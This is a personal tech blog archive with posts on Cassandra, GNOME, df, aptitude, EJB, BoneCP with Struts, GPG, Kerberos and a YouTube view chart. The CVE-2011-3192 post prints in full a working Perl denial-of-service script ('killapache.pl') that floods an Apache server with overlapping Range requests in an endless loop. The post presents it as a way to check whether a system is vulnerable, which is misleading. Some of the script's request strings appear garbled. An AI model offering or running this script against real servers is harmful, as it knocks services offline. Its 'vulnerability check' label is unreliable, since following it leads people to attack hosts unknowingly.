As cassandra 2.0 required jdk 7.0 or later, if your system has jdk 6 running and configure, it is still possible to run cassandra 2.0 with jdk7, that is to make them co-exists. Download jdk and extract to the directory, e.g. /usr/lib/jvm. add JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04/ to /etc/default/cassandra. This should export the variable JAVA_HOME to your environment so that jdk 7 is used to start the cassandra successfully.

Because the above setting is set to work for cassandra instance only, for the admin tools that come with it, we will set another environment for it. This make sure we don't break our existing work. If you want the environment to work only for yourself, then you should create a file in your home directory. $HOME/.cassandra.in.sh . Below are the content.

JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04
. /usr/share/cassandra/cassandra.in.sh

This first line is the same as previously but the second line, we source the additional environment setting for the admin tools so that it can find the java classes. With that done, you should not get the error Unsupported major.minor version 51.0 below anymore!

Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/cassandra/tools/NodeCmd : Unsupported major.minor version 51.0
	at java.lang.ClassLoader.defineClass1(Native Method)
	at java.lang.ClassLoader.defineClassCond(ClassLoader.java:631)
	at java.lang.ClassLoader.defineClass(ClassLoader.java:615)
	at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:141)
	at java.net.URLClassLoader.defineClass(URLClassLoader.java:283)
	at java.net.URLClassLoader.access$000(URLClassLoader.java:58)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:197)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:190)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:306)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:301)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:247)
Could not find the main class: org.apache.cassandra.tools.NodeCmd.  Program will exit.

Sunday, October 13, 2013

Changing default application that start a file

Sometime the default installation of an operating system configuration is not the way you wanted it to be, so with this article, it will show you how to change the application that open a file. Note that this article will work in gnome version 3.4.2 or later.

gui way
This is an easy way if you don't want to dig deep into how is the gnome mechanism file opening work. Just right click on the file, click on Properties. An pop up window associated with the file you selected appeared. On the tab Open With , locate the application you want the file to open with and then select it.

cli way
If you want to dig a little deeper, there are many configuration files located in /usr/share/applications. These files contain information about an application like application name and application exec command to trigger the start of an application. Once you located the application you want a file to be associated to start with, e.g. I would like csv file to be started with libreoffice-calc.desktop , then go to $HOME/.local/share/applications directory, locate another file, mimeapps.list. Open this file with an text editor, under the group [Default Applications] , add an entry like text/csv=libreoffice-calc.desktop. If you want to associated with more files, locate the general mime file at /etc/mime.types, and start to populate your environment with default application.

https://developer.gnome.org/integration-guide/stable/desktop-files.html.en

Saturday, October 12, 2013

analysis graph - gangnam style view

So after a year run, everyone on earth should not be alien about gangnam style; the korean kpop hit songs. It's impresive we see this video view in youtube break the most view youtube holder and set itself far ahead than the rest top 10 most view youtube videos.

Numbers speak and represent the popularity of the content, in this case, the song and the singer. With this article, I would like to share my thought and history experience about this song view chart. This is just my analysis and opinion based on this graph.

It was released sometime ago but it has not gain momentum, probably due to just released and new to the people. But from the black circle, this is where the slope is at its highest. At this time, videos played all over the tv, news play over and over in the radio, and even in social networking websites, everyone sharing this songs to everyone. The rate of explosion is tremendous!

Then we continue to see the curve going upward...as indicated in the red circle. There was a time where there is a video circulate in the internet said how the view is generated using a paid service company.. LoL.. lame.. that is, if you want to get your views goes high up, you paid a certain amount to a company, and they click on your video and view and does that continously for you. :-) But I don't think it happen for this song, because this gangnam trend is seem throughout the earth.. though it is korean song, the impact is everywhere, we can see mass public doing mob dance everywhere on earth.. also, the hundred of parodies....

Though the graph is still rising, as seen in blue circle, the rate of view is definitely slow down. somewhere during the period of 2013 april, that's about 6 months run! I think it has done good , considering a good pop song would not last like 2-3months... Nonetheless, true fans of Psy and newbie just watch the video still contributing the view rate. At this stage, Psy and his gangnam style has reach the fame and every household would know him.. maybe your pet, dog and cat too. :-)

The record breaking at almost 1.8billions view after july 2013 is really astonishing and greatest achievement. We see the graph not grow but in fact, if you zoom into the last of light yellow circle, you will see the fall of the view rate. I guesss it is only normal everyone is bored with this pop song. Would it grow any higher and stay steady? Trend and time will tell because we see history, there are pop songs goes back into chart, with gangnam style, there is high possibility too. Thereby push the graph higher.

That's it for my analysis and thank you for reading.

cassandra 2.0 catch 101

This is my experience with cassandra 2.0 and cqlsh, reading through the datastax documentation [1] , sometime you need to play around with the new tool to understand with the nature of the usage. It could be a bug, it could be just some changes, nonetheless, it is my experience reading and experiencing in cassandra 2.0. Some bugs may be fix or change in the later cassandra release and thus render this article invalid.. thus this article is only meant for cassandra 2.0 and cqlsh 4.0.0 . I will add more in my journey to cassandra 2.0

when updating config durable_writes to the keyspace, got a few times error... like below.


cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : false};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : false};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'false'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'false'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 0};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 0};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 1};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 1};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '1'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '1'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '0'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : '0'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'False'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'False'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'True'};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : 'True'};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : True};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : True};] reason: NullPointerException null
cqlsh:jw_schema1> alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : False};
Bad Request: Failed parsing statement: [alter keyspace jw_schema1 WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3, durable_writes : False};] reason: NullPointerException null

just specified as one config in the alter keyspace command. It strange alter keyspace is not in the cqlsh help file...


cqlsh:jw_schema1> alter keyspace jw_schema1 with durable_writes = false;
cqlsh:jw_schema1> DESCRIBE KEYSPACE jw_schema1;

CREATE KEYSPACE jw_schema1 WITH replication = {
  'class': 'SimpleStrategy',
  'replication_factor': '3'
} AND durable_writes = 'false';

voila!

[1] http://www.datastax.com/documentation/cassandra/2.0/webhelp/index.html#cassandra/configuration/configStorage_r.html#reference_ds_itw_wkz_1k
[2] http://cassandra.apache.org/doc/cql3/CQL.html#alterKeyspaceStmt

Friday, October 11, 2013

disk usage via command df

I'm pretty sure all of us have bunch of collections files like documents, audio and video in our computer and what is the simple way to check if the disk space usage is exceed the capacity that physical disk provided? For starter, I'm using a command called df, it cames from the package coreutils if you are using Fedora.

What is df?
df displays the amount of disk space available on the file system containing each file name argument.

Example of usage of df?


$ df
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/mapper/vg_super-lv_root
                      51606140   9213992  39770708  19% /
tmpfs                  1977424      2348   1975076   1% /dev/shm
/dev/sda5               495844     68681    401563  15% /boot
/dev/mapper/vg_super-lv_home
                      92792824  60272440  27806708  69% /home


$ df /usr/share/man/man1/df.1.gz
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/mapper/vg_super-lv_root
                      51606140   9214012  39770688  19% /

df in techical
- Disk space is shown in 1K blocks by default, unless the environment variable POSIXLY_CORRECT is set, in which case 512-byte blocks are used.
- if the partition is not mounted, it will not shown in the df report.

Based on the example usage shown above, the output shown is not human readable, we have to add additional parameters to the command df to make the report much more readable, I summarize some of the parameters with description which I frequently used but if you want a full list, man df to get an all parameters available to command df.

 -h, with this parameter, it output human readable size, such as KiB, MiB

 -H, with this parameter, it output human readable size too but use power of  1000 not 1024. You could probably noticed that the hard disk normally use this unit to measure its capacity.

  -T, with this parameter, it show additional column called type to shown the type of filesystem it is formatted.

 --total, with this parameter, it give you a grand total of all the mounted filesystem in the report.

[debian] installing and removing with the same command

When you need to install a package and remove a package, you can do it with a single command than two separate commands. This can be achieve by appending a suffix to the package name. When the aptitude install command is used, a '-' to the suffix of the package name is to remove the package while an aptitude command remove with a '+' suffix to the package name is to install the package.

# aptitude install package1 package2-

# aptitude remove package1+ package2

what pages in memory context?

When a process uses some memory, the CPU is marking the RAM as used by that process. For efficiency, the CPU allocate RAM by chunks of 4K bytes (it's the default value on many platforms). Those chunks are named pages. Those pages can be swapped to disk, etc.

Thursday, October 10, 2013

cassandra

I've been studying cassandra recently and would like to share my findings.

What is cassandra?

Apache Cassandra is an open source, distributed, decentralized, elastically scalable, highly available, fault-tolerant, tuneably consistent, column-oriented database.

Cassandra is an open source distributed database management system. It is designed to handle very large amounts of data spread out across many commodity servers while providing a highly available service with no single point of failure.

Cassandra provides a structured key-value store with eventual consistency. Keys map to multiple values, which are grouped into column families. The column families are fixed when a Cassandra database is created, but columns can be added to a family at any time. Furthermore, columns are added only to specified keys, so different keys can have different numbers of columns in any given family. The values from a column family for each key are stored together, making Cassandra a hybrid between a column-oriented DBMS and a row-oriented store.

where is cassandra use?
well, you can store whatever you want, for example, we used cassandra to store the call detail record.

where do i get started to learn cassandra?
i suggest you start with a cassandra book for beginner or person coming from RDBMS. Because there are new terminology with is introduced in cassandra. When you get a hold on cassandra, you should really get the source from apache cassandra website and they have a great information in their wiki page.

where do i get help if i have question?
they have mailing list where you can find if your question is asked before or you can contact me. :-)

Enterprise JavaBeans

1. What is EJB?
Enterprise JavaBeans is a managed, server-side component architecture for modular construction of enterprise application.

2. What is feature of EJB?
EJB provies stateless session beans which is efficient avenue for distributed transactions. It also provides remote and transaction support where simple POJOs does not.

3. Where is EJB best used at?
You should use ejb if it solves a problem for you that one of the light weight frameworks does not. For examples, clustering, fail-over, distributed caching and administration tools.

4. should we use ejb 2.0 or ejb 3.0 if im starting it out to learn ejb?
excerpt from stackoverflow.com [4]
The goal of EJB 3.0 is target ease of development, the main theme of the JAVA EE 5 platform release. EJB 3.0 is a major simplification over the APIs defined by the EJB 2.1 and earlier specifications. The simplified EJB 3.0 API allows developers to program EJB components as ordinary Java objects with ordinary Java business interfaces rather than as heavy weight components. Both component and client code are simplified, and the same tasks can be accomplished in a simpler way, with fewer lines of code. Because it is much simpler, EJB 3.0 is also much faster to learn to use than EJB 2.1

5. Any book describing EJB which you recommend?
Enterprise JavaBeans 3.1 [5]

6. Show me example of codes that EJB are used at?
in the web environment.

web.xml


   <ejb-ref>
       <ejb-ref-name>ejb/userManagerBean</ejb-ref-name>
       <ejb-ref-type>Session</ejb-ref-type>
       <home>gha.ywk.name.entry.ejb.usermanager.UserManagerHome</home>
       <remote>what should go here??</remote>
   </ejb-ref>


   class Foo
   {
   
     public UserManager getUserManager() throws HUDException
     {
       String ROLE_JNDI_NAME = 'ejb/userManagerBean';
       
       try
       {
         Properties props = System.getProperties();
         Context ctx = new InitialContext(props);
         UserManagerHome userHome = (UserManagerHome) ctx.lookup(ROLE_JNDI_NAME);
         UserManager userManager = userHome.create();
         WASSSecurity user = userManager.getUserProfile('user101', null);
         return userManager;       
       }
       catch (NamingException e)
       {
         log.error('Error occured while getting EJB UserManager ' + e);
         return null;
       }
       catch (RemoteException ex)
       {
         log.error('Error occured while getting EJB UserManager' + ex);
         return null;
       }
       catch (CreateException ex)
       {
         log.error('Error occured while getting EJB UserManager' + ex);
         return null;
       }
       
     }
      
   }
   
   // create a home interface
   // a remote EJB object - extends javax.ejb.EJBHome
   // a local EJB object - extends javax.ejb.EJBLocalHome
   public interface MyBeanRemoteHome extends javax.ejb.EJBHOME
   {
     MyBeanRemote create() throws javax.ejb.CreateException, java.rmi.RemoteException;      
   }
   
   // create an business interface in order to define business logic in our
   // ejb object
   
   // a remote EJB object - extends javax.ejb.EJBObject
   // a local EJB object - extends javax.ejb.EJBLocalObject
   public interface MyBeanRemote extends javax.ejb.EJBObject
   {
      void doSomething() throws java.rmi.RemoteException;   
   }
   
   // our ejb
   public class MyBean implements javax.ejb.SessionBean
   {
      // why create method ? Take a special look at EJB Home details (above)
      public void create()
      {
         System.out.println('create');
      }
      
      public void doSomething() throws java.rmi.RemoteException
      {
         // some code      
      }
   }

ejb-jar.xml


   <?xml version='1.0' encoding ='UTF-8'?>
   <ejb-jar xmlns='http://java.sun.com/xml/ns/j2ee' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/ejb-jar_2_1.xsd version='2.1'>
     <enterprise-beans>
       <sessions>
          <ejb-name>HelloWorldEJB</ejb-name>
          <home>br.com.MyBeanRemoteHome</home>
          <remote>br.com.MyBeanRemote</remote>
          <local-home>br.com.MyBeanLocalHome</local-home>
          <local>br.com.MyBeanLocal</local>
          <ejb-class>br.com.MyBean</ejb-class>
          <session-type>Stateless</session-type>
          <transaction-type>Container</transaction-type>
       </sessions>
     </enterprise-beans>
   </ejb-jar>

and put in META-INF directory.


   /META-INF/ejb-jar.xml
   br.com.MyBean.class
   br.com.MyBeanRemote.class
   br.com.MyBeanRemoteHome.class

now our ejb 3.0


   // or @Local
   // You can not put @Remote and @Local at the same time
   @Remote
   public interface MyBean
   {
      void doSomething();
   }
   
   @Stateless
   public class MyBeanStateless implements MyBean
   {
   
      public void doSomething()
      {
         
      }   
   
   }

[1] http://stackoverflow.com/questions/2506915/why-should-i-use-ejb
[2] http://www.innoq.com/blog/st/2007/03/01/java_eeejb_3_vs_spring.html
[3] http://en.wikipedia.org/wiki/Enterprise_JavaBean
[4] http://stackoverflow.com/questions/1737686/help-me-out-in-learning-ejb
[5] http://www.amazon.com/Enterprise-JavaBeans-3-1-Andrew-Rubinger/dp/0596158025/ref=sr_1_1?s=books&ie=UTF8&qid=1319341380&sr=1-1

Wednesday, October 9, 2013

how to configure bonecp 0.7.1 in struts 1.3.10

This is a response to http://stackoverflow.com/questions/9203648/how-to-do-connection-pooling-on-struts-fraework/9204790#comment11767509_9204790 the question of the Original Poster on how to configure bonecp in struts. Due to the lengthy of the howto, thus, the environment setup, coding, and detail guide are describe here instead.

Note! This howto is not meant for performance nor able to work for everyone but it serve as a guide to ensure bonecp able to work in struts in 1.3. As far as I know, data-sources is removed from struts 1.2 dtd and thus,this guide serve as a functional documentation on how to configure bonecp in struts via tomcat5.

1. the environment for this howto is at below


    operating system      : centos 5.6 2.6.18-238.19.1.el5
    tomcat                : tomcat5-5.5.23-0jpp.19.el5_6
    struts                : struts-1.3.10
    bonecp                : bonecp-0.7.1.RELEASE.jar
    mysql-connector-java  : mysql-connector-java-5.1.16.jar
    mysql                 : mysql-server-5.0.95-1.el5_7.1
    dependency of struts  : commons-digester-1.8.jar
                            commons-chain-1.2.jar
                            commons-beanutils-1.8.0.jar
                            struts-taglib-1.3.10.jar
    dependency of bonecp  : guava-11.0.1.jar                             
                            slf4j-api-1.6.4.jar

2. Note: place these jar file into tomcat common lib directory,


bonecp-0.7.1.RELEASE.jar
guava-11.0.1.jar
slf4j-api-1.6.4.jar (and slf4j-log4j if you want to)
mysql-connector-java-5.1.16.jar

3. Locate tomcat server.xml (for this example, it is /etc/tomcat5/server.xml) and provide this below, under GlobalNamingResources, add a new resource.


    <Resource type='javax.sql.DataSource'
              name='demodb'
           factory='com.jolbox.bonecp.BoneCPDataSource'
   driverClassName='com.mysql.jdbc.Driver'
           jdbcUrl='jdbc:mysql://localhost/demo'
          username='user1'
          password='password1'
        idleMaxAge='240'
     idleConnectionTestPeriod='60'
    partitionCount='3'
  acquireIncrement='5'
   maxConnectionsPerPartition='10'
   minConnectionsPerPartition='5'
          statementsCacheSize='50'
         releaseHelperThreads='5'
         />

4. Location tomcat context.xml (for this example, it is /etc/tomcat5/context.xml), add a resource link.


 <!-- The contents of this file will be loaded for each web application -->
<Context>

    <!-- Default set of monitored resources -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname='' />
    -->

    <ResourceLink global='demodb' name='demodb' type='javax.sql.DataSource'/>


</Context>

5., then, the struts-config.xml


<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE struts-config PUBLIC
'-//Apache Software Foundation//DTD Struts Configuration 1.3//EN'
'http://jakarta.apache.org/struts/dtds/struts-config_1_3.dtd'>

<struts-config>

    <form-beans>
        <form-bean name='helloWorldForm' type='com.e2e.form.HelloWorldForm' />
    </form-beans>

    <action-mappings>
        <action path='/helloWorld' type='com.e2e.action.HelloWorldAction'
            name='helloWorldForm'>
            <forward name='success' path='/HelloWorld.jsp' />
        </action>
        <action path='/DataSource' type='com.e2e.action.TestDataSource'>
             <forward name='success' path='/success.jsp'></forward>
        </action>
    </action-mappings>

</struts-config>

6. then the web description, web.xml


<!DOCTYPE web-app PUBLIC
 '-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN'
 'http://java.sun.com/dtd/web-app_2_3.dtd' >
 
<web-app>
  <display-name>bonecp-struts</display-name>
 
  <servlet>
    <servlet-name>action</servlet-name>
    <servlet-class>
        org.apache.struts.action.ActionServlet
    </servlet-class>
    <init-param>
        <param-name>config</param-name>
        <param-value>
         /WEB-INF/struts-config.xml
        </param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
 
  <servlet-mapping>
       <servlet-name>action</servlet-name>
       <url-pattern>*.do</url-pattern>
  </servlet-mapping>
 
  <resource-ref>
        <description>struts-bonecp</description>
        <res-ref-name>demodb</res-ref-name>
        <res-type>javax.sql.DataSource</res-type>
        <res-auth>Container</res-auth>
    </resource-ref>
 
</web-app>

7. then the TestDataSource.java


package com.e2e.action;

import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.sql.DataSource;

import org.apache.struts.action.Action;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;

public class TestDataSource extends Action
{
    public ActionForward execute(ActionMapping mapping,
                                                     ActionForm form,
                                                     HttpServletRequest request,
                                                     HttpServletResponse response) throws Exception
    {
        javax.sql.DataSource dataSource;
        java.sql.Connection myConnection=null;
        try
        {
            dataSource = getDataSource(request);
            if (dataSource == null)
            {
                System.out.println('datasource is null');
            }
            myConnection = dataSource.getConnection();
            Statement stmt=myConnection.createStatement();
            ResultSet rst=stmt.executeQuery('select username from test');
            System.out.println('******************************************');
            System.out.println('********Out Put from TestDataSource ******');
            while(rst.next())
            {
                System.out.println('User Name is: ' + rst.getString('username'));
            }
            System.out.println('******************************************');
            rst.close();
            stmt.close();
            // do what you wish with myConnection
        }
        catch (SQLException sqle)
        {
            getServlet().log('Connection.process', sqle);
        }
        finally
        {
            //enclose this in a finally block to make
            //sure the connection is closed
            try
            {
                myConnection.close();
            }
            catch (SQLException e)
            {
                getServlet().log('Connection.close', e);
            }
        }

        return mapping.findForward('success');
    }

    private DataSource getDataSource(HttpServletRequest request) throws NamingException
    {
        Context ctx = new InitialContext();
        DataSource ds = (DataSource)ctx.lookup('java:comp/env/demodb');
        return ds;
    }

}

8. create a simple jsp page under directory WEB-INF


    <%@ page language='java' contentType='text/html; charset=UTF-8'
    pageEncoding='UTF-8'%>
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN' 'http://www.w3.org/TR/html4/loose.dtd'>
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<title>Insert title here</title>
</head>
<body>
OK
</body>
</html>

9. finally, hit the link http://:8080/bonecp-struts/DataSource.do
you should be able to see an OK in the browser and if you tail the log in tomcat log directory (in this example, it is /var/log/tomcat5/catalina.out) , you should be able to see data is retrieve from the database and printed.

http vulnerability CVE-2011-3192

What is the vulnerable about?
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086. see [4] for more information.

What actually happen in the vulnerable system?
see the video [2] which show spike in the httpd processes in the system as well as consume a lot of cpu cycle and memory.

Has it been fixed?
yes, see [3]

What is the rpm for this fix?
to be exact, it is fixed in apache version 2.2.20 and it is available in the
2.2.3-53.el5.centos.1 rpm. for more information, see [5]

Is there a way to check if system is vulnerable?
yes, you can use this script.


#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print 'Apache Remote Denial of Service (memory exhaustion)';
    print 'by Kingcope';
    print 'usage: perl killapache.pl  [numforks]';
    print 'example: perl killapache.pl www.example.com 50';
}

sub killapache {
print 'ATTACKING $ARGV[0] [using $numforks forks]';
   
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = '';
for ($k=0;$k<1300;$k++) {
    $p .= ',5-$k';
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;    
   
$x = '';
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => '80',
                                  Proto    => 'tcp');

$p = 'HEAD / HTTP/1.1Host: $ARGV[0]Range:bytes=0-$pAccept-Encoding: gzipConnection: close';
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ':pPpPpppPpPPppPpppPp';
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => '80',
                            Proto    => 'tcp');

$p = 'HEAD / HTTP/1.1Host: $ARGV[0]Range:bytes=0-$pAccept-Encoding: gzipConnection: close';
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
    print 'host seems vuln';
    return 1;   
} else {
    return 0;   
}
}

if ($#ARGV < 0) {
    usage;
    exit;   
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
    print 'Host does not seem vulnerable';
    exit;   
}

while(1) {
  killapache();
}

[1] http://seclists.org/fulldisclosure/2011/Aug/281
[2] http://www.youtube.com/watch?v=3al1lsvFSpA
[3] https://bugzilla.redhat.com/show_bug.cgi?id=732928
[4] https://www.redhat.com/security/data/cve/CVE-2011-3192.html
[5] https://www.apache.org/dist/httpd/Announcement2.2.html

Monday, October 7, 2013

Gnu Privacy Guard (GPG) introduction

1. what is gpg?
GNU Privacy Guard (GnuPG or GPG) is a GPL licensed alternative to
the PGP suite of cryptographic software.

2. where does it used?
excerpt from wikipedia [3]
Although the basic GnuPG program has a command line interface,
there exist various front-ends that provide it with a graphical user
interface. For example, GnuPG encryption support has been integrated
into KMail and Evolution, the graphical e-mail clients found in KDE
and GNOME, the most popular Linux desktops. There are also
graphical GnuPG front-ends (Seahorse for GNOME, KGPG for KDE).
For Mac OS X, the Mac GPG project provides a number of Aqua
front-ends for OS integration of encryption and key management as
well as GnuPG installations via Installer packages. Furthermore, the
GPGTools Installer installs all related OpenPGP applications (GPG
Keychain Access), plugins (GPGMail) and dependencies (MacGPG) to
use GnuPG based encryption. Instant messaging applications such as
Psi and Fire can automatically secure messages when GnuPG is
installed and configured. Web-based software such as Horde also
makes use of it. The cross-platform plugin Enigmail provides GnuPG
support for Mozilla Thunderbird and SeaMonkey. Similarly, Enigform
provides GnuPG support for Mozilla Firefox. FireGPG was
discontinued June 7, 2010.

2. should i use it?
excerpt from the kernel discussion [1]
There is going to be discussion about security procedures at the kernel
summit; to date we've been focused on the short-term requirements to
get git.kernel.org back up so that the next merge window can open up,
hopefully without getting instantly compromised again. That's going to
require the help of everyone that we trust, especially from folks who
are maintaining git repositories.

I personally don't think we're headed into sign-all-patches, since
patches still need to be reviewed, and at some level, as long as the
patch is reviewed to be Good Stuff, that's actually the most important
thing.

That being said, if you have a GPG key, and you can participate in a
key signing exercise so that you are part of the web of trust, that also
means that you have a much better ability to trust that git trees that
you pull down to your system that have signed tags are in fact
legitimate (at least up to a signed tag).

So there are good reasons why developers who primarily participate
by e-mailing patches might want to start using GPG.

3. how long should the new key be valid?
excerpt from the kernel discussion [1]
That is a good question. At the very least you want it to be valid for
long enough that you will be able to get enough signatures on a new
key *before* your old key expires. As such I would recommend 3-5
years depending on how much you trust yourself to keep the key
secure.

Some people have decided to opt for an unlimited key, but that
*requires* that you have a way to revoke the old key, which is why we
are considering a key revocation escrow service.

4. what tools do i need to generate a gpg key?
well, you need gpg. To generate the key,
$ gpg --gen-key and follow the steps on screen.
you can read for more information in [2]

[1] http://help.lockergnome.com/linux/kernel-org-status-establishing-PGP-web-trust--ftopict544109.html
[2] http://cryptnet.net/fdp/crypto/keysigning_party/en/keysigning_party.html#prep
[3] http://en.wikipedia.org/wiki/GNU_Privacy_Guard

kerberos

1. what is kerberos?

from wikipedia,

kerberos is a computer network authentication protocol which works on the basis of 'tickets' to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

okay... so what it actually means?
It means in a network, a client computer authenticate to a server and this process mutually prove the identify of the client and the server respectively.

A 'ticket' is produced if the identity is authenticated and authorized. This ticket can be used by client to access the computer resources that it allowed to.
2. how does it really works?

Imagine with two computer, server A and client B. server A and client B is connected together in a TCP network. Now client B need to access a computer resource, which require authentication.

Server A provide the service of authentication over the network. Now client B will authenticate itself to the Authentication Server (AS). This username will be forward to a Key Distribution Center (KDC).

The KDC issues a Ticket Granting Ticket (TGT). TGT is produced with a time stamped, encrypt it using the user password. TGT will be return to the users' workstation.

If client B need to communicate to another node (kerberos coin it
'principal'), it send the TGT to the Ticket Granting Service (TGS). TGS shared the same host as the KDC. If the TGT is verified valid, then the user is permitted to access the requested service in the node. TGS will issue a Ticket and session keys to the client.

3. where does it used?
windows domain controller or in samba. Basically any service that support kerberos authentication.

4. should i use it?
That depend for a few factors. for one, if you are administrator for a organization which has many computer resources, you want to provide single sign on for the user. That is, once a user is authenticated, the authenticated user can access to the resources it allow it. Then in this situation, it may sounds logical to implement kerberos into the network authentication service.

5. any link for me to read further?
sure, i find the below is useful.
http://en.wikipedia.org/wiki/Kerberos_%28protocol%29" title="http://en.wikipedia.org/wiki/Kerberos_%28protocol%29
https://help.ubuntu.com/11.10/serverguide/kerberos.html" title="https://help.ubuntu.com/11.10/serverguide/kerberos.html
https://help.ubuntu.com/community/Kerberos" title="https://help.ubuntu.com/community/Kerberos
http://www.centos.org/docs/5/html/Deployment_Guide-en-US/ch-kerberos.html
http://www.centos.org/docs/5/html/CDS/ag/8.0/Introduction_to_SASL-Configuring_Kerberos.html
http://www.centos.org/docs/5/html/5.2/Deployment_Guide/s1-kerberos-clients.html

Pages